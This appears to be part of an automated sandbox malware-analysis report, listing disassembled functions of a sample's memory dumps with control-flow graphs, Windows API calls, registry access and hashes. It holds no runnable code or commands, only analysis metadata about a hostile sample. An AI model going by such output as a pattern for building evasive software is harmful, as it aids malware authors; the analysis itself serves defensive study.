                                            • Opcode Fuzzy Hash: 7e3ed49afb250fd95f2ce5112cf6113071f4731b2a9590b0307d8c494850a125
                                            • Instruction Fuzzy Hash: B7822C34A00209DFCB15CF68D9A8AAEBBF2FF88314F159659E405AB261D734ED41CF91
                                            Function 00E3A538 Relevance: .8, Instructions: 760COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3815818544.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e30000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70bd5e451733109180b7d7ae4f34444c7f89b82187eb8709d0beab57be0af5c8
                                            • Instruction ID: 1d179b0510a156682fcb4ed8f3cd533bb3a16c8ba43e7ea6fa6eb92a768f39c0
                                            • Opcode Fuzzy Hash: 70bd5e451733109180b7d7ae4f34444c7f89b82187eb8709d0beab57be0af5c8
                                            • Instruction Fuzzy Hash: 3E62F735E007198BDB24EF78C85469EBBF1BF89700F1485A9D54AAB251EF309E84CF91
                                            Function 00F8A32D Relevance: 6.2, APIs: 4, Instructions: 154threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00F8A42E
                                            • GetCurrentThread.KERNEL32 ref: 00F8A46B
                                            • GetCurrentProcess.KERNEL32 ref: 00F8A4A8
                                            • GetCurrentThreadId.KERNEL32 ref: 00F8A501
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: ec2278eae7b0f0ce1afc3984c809ff2f26396e561d38b38ae994eb0a6d0a68fd
                                            • Instruction ID: a5431b4f9ff7ba6c06c109e2cd65f4f38079f92be3d0be814b7d83594e106e2c
                                            • Opcode Fuzzy Hash: ec2278eae7b0f0ce1afc3984c809ff2f26396e561d38b38ae994eb0a6d0a68fd
                                            • Instruction Fuzzy Hash: 1061BCB0D053888FEB01DFA9D5487DEBFF0AF49314F24849AE048AB262D7745945CF26
                                            Function 00F8A3B0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 28 f8a3b0-f8a43f GetCurrentProcess 32 f8a448-f8a47c GetCurrentThread 28->32 33 f8a441-f8a447 28->33 34 f8a47e-f8a484 32->34 35 f8a485-f8a4b9 GetCurrentProcess 32->35 33->32 34->35 36 f8a4bb-f8a4c1 35->36 37 f8a4c2-f8a4da 35->37 36->37 50 f8a4dd call f8a5f0 37->50 51 f8a4dd call f8a580 37->51 41 f8a4e3-f8a512 GetCurrentThreadId 42 f8a51b-f8a57d 41->42 43 f8a514-f8a51a 41->43 43->42 50->41 51->41
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00F8A42E
                                            • GetCurrentThread.KERNEL32 ref: 00F8A46B
                                            • GetCurrentProcess.KERNEL32 ref: 00F8A4A8
                                            • GetCurrentThreadId.KERNEL32 ref: 00F8A501
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: b40bbcd56e19a0e7f20687430810a6f8cdf17064d8e4a5127ce9685545e9e45d
                                            • Instruction ID: c27b463fdad6132be1f63f5b41f3b5918f2ea18eed102db973e32c81a243428c
                                            • Opcode Fuzzy Hash: b40bbcd56e19a0e7f20687430810a6f8cdf17064d8e4a5127ce9685545e9e45d
                                            • Instruction Fuzzy Hash: 3D5156B0D012498FEB14DFA9D548BEEBBF1EF88314F24845AE409A7360DB749944CF66
                                            Function 00E86164 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 52 e86164-e86aa0 54 e86aa8-e86b14 RegOpenKeyExW 52->54 55 e86aa2-e86aa5 52->55 57 e86b1d-e86b55 54->57 58 e86b16-e86b1c 54->58 55->54 62 e86b68 57->62 63 e86b57-e86b60 57->63 58->57 64 e86b69 62->64 63->62 64->64
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00E86B04
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816328824.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID: l0$t1
                                            • API String ID: 71445658-1586161482
                                            • Opcode ID: 6aec69241a9fdcfc6d383ccbcf609f3c12c037060d2af9ea00718c791244bfd5
                                            • Instruction ID: fc9f35df4502321344a63a9ed1cc1521e898235b74ff74564699bda3ce5a8f8e
                                            • Opcode Fuzzy Hash: 6aec69241a9fdcfc6d383ccbcf609f3c12c037060d2af9ea00718c791244bfd5
                                            • Instruction Fuzzy Hash: BB3100B0D012488FDB10DF99C584A8EFBF5AB48308F24C16AE408BB241C7759945CBA4
                                            Function 00E31298 Relevance: 2.1, Strings: 1, Instructions: 814COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1211 e31298-e31786 1286 e31cd8-e31cf0 1211->1286 1287 e3178c-e3179c 1211->1287 1291 e31cf2-e31d0d 1286->1291 1292 e31d3c-e31d43 1286->1292 1287->1286 1288 e317a2-e317b2 1287->1288 1288->1286 1290 e317b8-e317c8 1288->1290 1290->1286 1293 e317ce-e317de 1290->1293 1298 e31d19-e31d37 1291->1298 1299 e31d0f-e31d14 1291->1299 1294 e31d45-e31d51 1292->1294 1295 e31dae-e31dba 1292->1295 1293->1286 1297 e317e4-e317f4 1293->1297 1305 e31d53-e31d5e 1294->1305 1306 e31d76-e31d79 1294->1306 1307 e31dd1-e31ddd 1295->1307 1308 e31dbc-e31dc8 1295->1308 1297->1286 1300 e317fa-e3180a 1297->1300 1298->1295 1335 e31d39 1298->1335 1303 e31dfe-e31e03 1299->1303 1300->1286 1304 e31810-e31820 1300->1304 1304->1286 1310 e31826-e31836 1304->1310 1305->1306 1323 e31d60-e31d6a 1305->1323 1311 e31d90-e31d9c 1306->1311 1312 e31d7b-e31d87 1306->1312 1325 e31df4-e31df6 1307->1325 1326 e31ddf-e31deb 1307->1326 1308->1307 1324 e31dca-e31dcf 1308->1324 1310->1286 1313 e3183c-e3184c 1310->1313 1315 e31e04-e31e50 1311->1315 1316 e31d9e-e31da5 1311->1316 1312->1311 1328 e31d89-e31d8e 1312->1328 1313->1286 1314 e31852-e31862 1313->1314 1314->1286 1321 e31868-e31cd7 1314->1321 1435 e31e53 call e31fc7 1315->1435 1436 e31e53 call e31fd8 1315->1436 1316->1315 1322 e31da7-e31dac 1316->1322 1322->1303 1323->1306 1338 e31d6c-e31d71 1323->1338 1324->1303 1325->1303 1326->1325 1336 e31ded-e31df2 1326->1336 1328->1303 1335->1292 1336->1303 1338->1303 1344 e31e59-e31e60 1345 e31e73-e31e7e 1344->1345 1346 e31e62-e31e6d 1344->1346 1351 e31e84-e31ef3 1345->1351 1352 e31f4f-e31f94 call e30d10 1345->1352 1346->1345 1350 e31ef6-e31f48 1346->1350 1350->1352 1370 e31f96-e31fa3 1352->1370 1371 e31fa5-e31fb3 1352->1371 1377 e31fc3-e31fc6 1370->1377 1379 e31fc1 1371->1379 1380 e31fb5-e31fbf 1371->1380 1379->1377 1380->1377 1435->1344 1436->1344
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3815818544.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e30000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "F
                                            • API String ID: 0-3077531203
                                            • Opcode ID: f12f6ff0bbe44517c6f29c90a184d9eeb679db9e6c0a108041a782e6cb367477
                                            • Instruction ID: 912bddc8b78691a046dab444c347c2f26249118bde4f7235ae745c2772284f83
                                            • Opcode Fuzzy Hash: f12f6ff0bbe44517c6f29c90a184d9eeb679db9e6c0a108041a782e6cb367477
                                            • Instruction Fuzzy Hash: F4721070A00218CFEB15DBA4C964BDEBBB2FF88710F1080A9D10A6B3A5DE359D45DF95
                                            Function 00E8D198 Relevance: 1.7, APIs: 1, Instructions: 191libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1695 e8d198-e8d1a5 1696 e8d15b-e8d193 1695->1696 1697 e8d1a7-e8d1b7 1695->1697 1698 e8d1b9-e8d1c3 1697->1698 1699 e8d1dc-e8d1e8 1697->1699 1700 e8d1d8-e8d1db 1698->1700 1701 e8d1c5-e8d1d6 1698->1701 1706 e8d1ea-e8d22f call e8ba28 1699->1706 1707 e8d195-e8d197 1699->1707 1701->1700 1714 e8d237-e8d23d 1706->1714 1707->1695 1715 e8d244 1714->1715 1716 e8d24b-e8d262 LdrInitializeThunk 1715->1716 1717 e8d268-e8d282 1716->1717 1718 e8d3ab-e8d3c8 1716->1718 1717->1718 1721 e8d288-e8d2a2 1717->1721 1730 e8d3cd-e8d3d6 1718->1730 1724 e8d2a8 1721->1724 1725 e8d2a4-e8d2a6 1721->1725 1727 e8d2ab-e8d306 call e8c46c 1724->1727 1725->1727 1737 e8d308-e8d30a 1727->1737 1738 e8d30c 1727->1738 1739 e8d30f-e8d3a9 call e8c46c 1737->1739 1738->1739 1739->1730
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816328824.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f77b8493e30c449d239c5e315a0be5c8955bd7659eb21f44649aa90f34979a58
                                            • Instruction ID: b4db2e4df9aa9a6832bc90b7406bc001728cbf129910df399d4ffec6dfdef156
                                            • Opcode Fuzzy Hash: f77b8493e30c449d239c5e315a0be5c8955bd7659eb21f44649aa90f34979a58
                                            • Instruction Fuzzy Hash: BB61B131B042089FDB05EBB4D855AEEBBF5BF89310F1485A9E009EB292DF34D905CB61
                                            Function 00E8BD08 Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1757 e8bd08-e8bd54 LdrInitializeThunk 1761 e8bd5b-e8bd67 1757->1761 1762 e8bf68-e8bf7b 1761->1762 1763 e8bd6d-e8bd76 1761->1763 1764 e8bfa2-e8bfa6 1762->1764 1765 e8bd7c-e8bd91 1763->1765 1766 e8bf9d 1763->1766 1767 e8bfa8 1764->1767 1768 e8bfb1 1764->1768 1770 e8bdab-e8bdc6 1765->1770 1771 e8bd93-e8bda6 1765->1771 1766->1764 1767->1768 1772 e8bfb2 1768->1772 1779 e8bdc8-e8bdd2 1770->1779 1780 e8bdd4 1770->1780 1773 e8bf3c-e8bf40 1771->1773 1772->1772 1775 e8bf4b 1773->1775 1776 e8bf42 1773->1776 1775->1762 1776->1775 1781 e8bdd9-e8bddb 1779->1781 1780->1781 1782 e8bddd-e8bdf0 1781->1782 1783 e8bdf5-e8be8d call e8a370 call e80040 * 2 1781->1783 1782->1773 1804 e8be9b 1783->1804 1805 e8be8f-e8be99 1783->1805 1806 e8bea0-e8bea2 1804->1806 1805->1806 1807 e8bea4-e8bea6 1806->1807 1808 e8bee6-e8bf3a 1806->1808 1809 e8bea8-e8beb2 1807->1809 1810 e8beb4 1807->1810 1808->1773 1812 e8beb9-e8bebb 1809->1812 1810->1812 1812->1808 1813 e8bebd-e8bee4 1812->1813 1813->1808
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816328824.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7530ad8557f3879c2829510c6e3b69f0f10fa4b49f2d4a59f0a86e0da2d690c3
                                            • Instruction ID: 67896de319999cfe2a79bfe29466e3d5a6c915b4ed1fb5fa1deef82a815d6971
                                            • Opcode Fuzzy Hash: 7530ad8557f3879c2829510c6e3b69f0f10fa4b49f2d4a59f0a86e0da2d690c3
                                            • Instruction Fuzzy Hash: F0614935A00309DBDB14FFB5D8587AEBBF2AF88704F108429E50AB7290DF799945DB90
                                            Function 00E8D1F8 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1823 e8d1f8-e8d262 call e8ba28 LdrInitializeThunk 1832 e8d268-e8d282 1823->1832 1833 e8d3ab-e8d3c8 1823->1833 1832->1833 1836 e8d288-e8d2a2 1832->1836 1845 e8d3cd-e8d3d6 1833->1845 1839 e8d2a8 1836->1839 1840 e8d2a4-e8d2a6 1836->1840 1842 e8d2ab-e8d306 call e8c46c 1839->1842 1840->1842 1852 e8d308-e8d30a 1842->1852 1853 e8d30c 1842->1853 1854 e8d30f-e8d3a9 call e8c46c 1852->1854 1853->1854 1854->1845
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816328824.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f0db0533034595ef56fdb560d5956f46c98e54031915cd644425dece2058c7a7
                                            • Instruction ID: 10030e75a220c7845032ddebc9ab5e5ce1e0e03af2bd58241207a08980813d3a
                                            • Opcode Fuzzy Hash: f0db0533034595ef56fdb560d5956f46c98e54031915cd644425dece2058c7a7
                                            • Instruction Fuzzy Hash: A9517371B402089BDB04FBB4D885AAEB7F5FF89710F148669E406AB291DF70DD05CBA1
                                            Function 00F866ED Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1872 f866ed-f8675e 1873 f86769-f86770 1872->1873 1874 f86760-f86766 1872->1874 1875 f8677b-f867b3 1873->1875 1876 f86772-f86778 1873->1876 1874->1873 1877 f867bb-f8681a CreateWindowExW 1875->1877 1876->1875 1878 f8681c-f86822 1877->1878 1879 f86823-f8685b 1877->1879 1878->1879 1883 f86868 1879->1883 1884 f8685d-f86860 1879->1884 1885 f86869 1883->1885 1884->1883 1885->1885
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00F8680A
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: fe8c76dc51563502f7bd644392299171411d6181697197f264644607fee89dbd
                                            • Instruction ID: dd0f109b5709eb32b2163937b308d3e88e6e14b21974dd02dde841b1cd9765ba
                                            • Opcode Fuzzy Hash: fe8c76dc51563502f7bd644392299171411d6181697197f264644607fee89dbd
                                            • Instruction Fuzzy Hash: 8151B0B5D00349DFDB14CFAAD884ADEBFB1BF88314F24812AE819AB250D7759945CF90
                                            Function 00F866F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1886 f866f8-f8675e 1887 f86769-f86770 1886->1887 1888 f86760-f86766 1886->1888 1889 f8677b-f8681a CreateWindowExW 1887->1889 1890 f86772-f86778 1887->1890 1888->1887 1892 f8681c-f86822 1889->1892 1893 f86823-f8685b 1889->1893 1890->1889 1892->1893 1897 f86868 1893->1897 1898 f8685d-f86860 1893->1898 1899 f86869 1897->1899 1898->1897 1899->1899
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00F8680A
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 60c5095e2b002ee8661628f9b6661f40d552ebeee765da7e09063cf04a9600d7
                                            • Instruction ID: 8b1a89a78bd6fe4e5f13e63255a90f6400aab52f3162a413b0fdfcfe256a26c9
                                            • Opcode Fuzzy Hash: 60c5095e2b002ee8661628f9b6661f40d552ebeee765da7e09063cf04a9600d7
                                            • Instruction Fuzzy Hash: 9041CEB5D00349DFDB14CF9AD884ADEFBB5BF48310F24812AE818AB250D771A985CF90
                                            Function 00F8A164 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1900 f8a164-f8b4f4 1903 f8b4fa-f8b4ff 1900->1903 1904 f8b5a4-f8b5c4 call f8478c 1900->1904 1905 f8b501-f8b538 1903->1905 1906 f8b552-f8b58a CallWindowProcW 1903->1906 1911 f8b5c7-f8b5d4 1904->1911 1913 f8b53a-f8b540 1905->1913 1914 f8b541-f8b550 1905->1914 1909 f8b58c-f8b592 1906->1909 1910 f8b593-f8b5a2 1906->1910 1909->1910 1910->1911 1913->1914 1914->1911
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 00F8B579
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: b083909f8e4125b4961585ee2d145975c8b4298ec04689300589d41ca5b2d407
                                            • Instruction ID: ae4c4ff9192ddb742601685ca98d174813ab5798f5de51b9dc7b28a9536131c1
                                            • Opcode Fuzzy Hash: b083909f8e4125b4961585ee2d145975c8b4298ec04689300589d41ca5b2d407
                                            • Instruction Fuzzy Hash: 564129B5900209CFDB14DF95C488BAABBF5FF88314F24C459E519AB321C774A941DFA0
                                            Function 00F8A6B8 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1917 f8a6b8-f8a6b9 1918 f8a6bb-f8a7e6 1917->1918 1919 f8a65d-f8a68c DuplicateHandle 1917->1919 1920 f8a68e-f8a694 1919->1920 1921 f8a695-f8a6b2 1919->1921 1920->1921
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F8A67F
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: e541d201215fe13f5945017b3c1f3dbde16c661c63bb7ba1bb8fe90015f0918b
                                            • Instruction ID: 10ff1e41c5cdbe9a1cb03085c8bbfcb934e3c5a1100b82d887f7c40951d5d648
                                            • Opcode Fuzzy Hash: e541d201215fe13f5945017b3c1f3dbde16c661c63bb7ba1bb8fe90015f0918b
                                            • Instruction Fuzzy Hash: D6414379E843449FE7019F60F8847A97BB5FB88310F15481AEA015B7C9CB748893DB51
                                            Function 00F8A5F0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1935 f8a5f0-f8a5f1 1936 f8a5f3-f8a68c DuplicateHandle 1935->1936 1937 f8a595-f8a5b9 call f89f8c 1935->1937 1940 f8a68e-f8a694 1936->1940 1941 f8a695-f8a6b2 1936->1941 1942 f8a5be-f8a5e4 1937->1942 1940->1941
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F8A67F
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: e9472909e484ee31c4d26bd059b34e710bf40db00dea0ac5d8d54a4003be9c3b
                                            • Instruction ID: 888ec8a2902ad85be7067684b42b74fec0392e58c0084dd984cc6bd3b9bddc85
                                            • Opcode Fuzzy Hash: e9472909e484ee31c4d26bd059b34e710bf40db00dea0ac5d8d54a4003be9c3b
                                            • Instruction Fuzzy Hash: 803159B69002489FDF01CF99D884AEEBBF5FB48310F18805AF914A7360D3349915DFA1
                                            Function 00E86170 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00E86DC1
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816328824.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 4f18243b739fd437c4356b0d6a638e232ab5bbc771e56aa546583d82d57b5881
                                            • Instruction ID: 6ad0ea109069125809ffe40b3d261b1fcc6f90260ffa483736eff3d8c9b702f3
                                            • Opcode Fuzzy Hash: 4f18243b739fd437c4356b0d6a638e232ab5bbc771e56aa546583d82d57b5881
                                            • Instruction Fuzzy Hash: FF31CDB5D002589BCB20DF9AD884A9EFBF5BB48710F25802AE819BB350D7709945CFA1
                                            Function 00F8A5F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F8A67F
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 3e7f952faad88fa0a5e209ec7d2f9405ce99ee9f32adf3ac5c841a83c39e40cd
                                            • Instruction ID: 962add363c5b3e0806db3119c632fa22b11da39b7c23be90625514d3449b0511
                                            • Opcode Fuzzy Hash: 3e7f952faad88fa0a5e209ec7d2f9405ce99ee9f32adf3ac5c841a83c39e40cd
                                            • Instruction Fuzzy Hash: 1821C4B5D002489FDB10CFAAD884ADEFBF8FB48320F14845AE918A7350D374A954CFA5
                                            Function 00E8BD07 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816328824.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_e80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 57b40c16be810ee486c8deb5da9e1bf2a6dbb922dc7d5540c618721da45fc7bc
                                            • Instruction ID: ca6531ffb4629f7f2e66779eb894fa89542cc321865fefb972157f9e100d2436
                                            • Opcode Fuzzy Hash: 57b40c16be810ee486c8deb5da9e1bf2a6dbb922dc7d5540c618721da45fc7bc
                                            • Instruction Fuzzy Hash: 01112E70A11309DFDB14EF64D898ADEBBB1FF89315F108568E509BB251CB359885CF44
                                            Function 00F836BC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00F856B6
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 083b3193a99a1682206b64e25699ebc1c7f4714546120336ded4252683aa05a5
                                            • Instruction ID: 893306f68cfeebb19f8efdbcf29f6a6a2b283446329793376c5d89b26998581f
                                            • Opcode Fuzzy Hash: 083b3193a99a1682206b64e25699ebc1c7f4714546120336ded4252683aa05a5
                                            • Instruction Fuzzy Hash: 8011F0B6C006498FDB10DF9AD444BDEFBF4AB48724F50842AD819B7210D375A945CFA5
                                            Function 00F85649 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00F856B6
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3816887867.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_f80000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 7735fcc496386638e25537565ca79264d86dd525fc34922f9473f06cc0be3fe4
                                            • Instruction ID: dcfc6f14c65876f6636fda512b1cf40a24a4b602ef90757ecb77f9d49d1d3472
                                            • Opcode Fuzzy Hash: 7735fcc496386638e25537565ca79264d86dd525fc34922f9473f06cc0be3fe4
                                            • Instruction Fuzzy Hash: 241123B5C006498FDB10DFAAC444BDEFBF0AF88724F14846AD468A7200C375A546CFA5
                                            Function 063637E9 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3835446785.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_6360000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-1096056059
                                            • Opcode ID: 78d309a102f6214443e185e1423136525bb36e893b5be11cba573f7316cf39d7
                                            • Instruction ID: d550e5f4ac163061cf25749b51e263dfabd57df569f98e1aab84ed5e1a217515
                                            • Opcode Fuzzy Hash: 78d309a102f6214443e185e1423136525bb36e893b5be11cba573f7316cf39d7
                                            • Instruction Fuzzy Hash: 12119D317013059FD358DFA5D490A9BB7E6FF84724B208A2DE21ADB384DF71A905CBA4
                                            Function 063637F8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.3835446785.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_16_2_6360000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-1096056059
                                            • Opcode ID: 64cb5b15f11f2c18f91ae151f8d0ef376ef391a48b06219ce84e390f559e55e1
                                            • Instruction ID: c99246906539ae0fd7fbe351727166eae573eb72288bb2cb48daf109322dcc69
                                            • Opcode Fuzzy Hash: 64cb5b15f11f2c18f91ae151f8d0ef376ef391a48b06219ce84e390f559e55e1
                                            • Instruction Fuzzy Hash: 0311BC307003058FD358EFA5D49069BB3E6EF84724B20893DE21A9B384DF719D05CBA4
                                            Function 063637C1 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
